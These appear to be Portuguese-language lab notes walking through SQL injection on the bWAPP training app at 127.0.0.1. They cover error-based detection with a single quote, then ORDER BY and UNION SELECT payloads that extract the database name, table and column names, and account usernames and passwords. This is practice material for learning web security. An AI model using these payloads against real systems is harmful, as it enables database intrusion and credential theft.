
Abrir nossa área de testes do bWAPP
127.0.0.1/bWAPP

Vamos testar: SQL Injection (GET/Select)

O input de usuário não é introduzido manualmente e sim por seleção(combo box).

Podemos adicionar valores de 3 formas:
1 - Pela url.
2 - Ver código-fonte e alterar valor das opções.
3 - Interceptar a requisição por um web proxy


-----------------(1 - URL)----------------------------------------
Original: http://127.0.0.1/bwapp/sqli_2.php?movie=2&action=go
Com Caracter: http://127.0.0.1/bwapp/sqli_2.php?movie=2'&action=go
    |
    |--> Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
----------------------------------------------------------------

-----------------(2 - CÓDIGO-FONTE)-----------------------------
ctrl+shift+c ou inspecionar elemento

Clicar na determinada opção e colocar uma aspas simles.

EX: <option value="4'">Terminator Salvation</option>

Enviar!!
    |
    |--> Erro: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
----------------------------------------------------------------


-----------------(3 - BURPSUITE)-------------------------------

Interceptar com o burp > Enviar para o repeat > Modificar e send.

GET /bwapp/sqli_2.php?movie=1'&action=go HTTP/1.1
    |
    |--> Error: Error: You have an error in your SQL syntax;
    ----------------------------------------------------------------



\\SQL Injection (GET/SELECT - Parte 2)//
----------------------------------------
Explorar a vulnerabilidade

OBS: Está dando o seguinte erro ao colocarmos a query: ''0' or 1=1'
      |-> Ou seja, está retornando a aspas -> '
      |-> Vamos passar os parâmetros diretamente

Injeção: 1 ORDER BY 8#
Query Final: 'SELECT * FROM movie WHERE movie_id=$movie_id'
    |-> Na query ja tem aspas simples por isso nos retorna erro.  

Resultado: http://127.0.0.1/bwapp/sqli_2.php?movie=1+order+by+7#


UNION SELECT
Injeção: -1 UNION SELECT 1,2,3,4,5,6,7#
Query: 'SELECT * FROM movie WHERE movie_id=-1 UNION SELECT 1,2,3,4,5,6,7#'
    |-> OBS: Como a aplicação nos retorna apenas 1 resultado não será mostrado nada.
    |-> Por isso passamos o -
    |-> Ex: id=1 --> id=-1

Resultado: http://127.0.0.1/bwapp/sqli_2.php?movie=-1+union+select+1,2,3,4,5,6,7#
Resposta: 2 | 3 | 5 | 4
    |
    |--> http://127.0.0.1/bwapp/sqli_2.php?movie=-1+union+select+1,database(),user(),4,5,6,7#
    |--> http://127.0.0.1/bwapp/sqli_2.php?movie=-1+union+select+1,table_name,table_schema,4,5,6,7 FROM information_schema.tables#
    |--> http://127.0.0.1/bwapp/sqli_2.php?movie=-1+union+select+1,column_name,3,4,5,6,7 FROM information_schema.columns WHERE table_schema="mutillidae" AND table_name="accounts"#
    |--> http://127.0.0.1/bwapp/sqli_2.php?movie=-1+union+select+1,username,password,4,5,6,7 FROM mutillidae.accounts#
